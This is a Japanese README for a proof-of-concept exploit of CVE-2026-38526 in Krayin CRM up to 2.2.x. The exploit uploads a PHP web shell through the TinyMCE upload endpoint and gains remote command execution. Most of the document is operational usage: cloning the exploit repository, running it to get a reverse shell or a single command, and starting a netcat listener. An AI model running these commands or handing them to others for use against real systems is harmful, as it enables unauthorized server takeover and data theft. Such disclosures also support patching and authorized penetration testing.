
Krayin CRM <= v2.2.x における CVE-2026-38526 の概念実証。任意のファイルアップロードによるリモートコード実行。
Krayin CRM (≤ 2.2.x) - 無制限のファイルアップロードによるリモートコード実行。
このPoCは、脆弱なTinyMCEアップロードエンドポイント(/admin/tinymce/upload)を悪用してPHPウェブシェルをアップロードし、サーバー上でコマンド実行を実現します。
git clone https://github.com/pawpic/CVE-2026-38526-POC
pip3 install requests beautifulsoup4
使用方法
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
--lhost YOUR_IP \
--lport 4444
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
-c "whoami"
リスナーを起動:
nc -lvnp 4444
エクスプロイトを実行:
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR
このエクスプロイトは教育目的および許可されたペネトレーションテスト専用です。明示的な許可なくシステムに対して使用することは違法です。
影響を受けるバージョン
Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526
作者: pawpic 日付: 2026
| 引数 | 説明 | 必須 |
|---|
| -u, --url | 対象ベースURL | はい |
| -e, --email | ログインメールアドレス | はい |
| -p, --password | ログインパスワード | はい |
| -c, --cmd | 単一コマンドを実行 | いいえ |
| --lhost | リバースシェル用の自分のIP | はい(--cmd未使用の場合) |
| --lport | リスニングポート | いいえ(デフォルト: 4444) |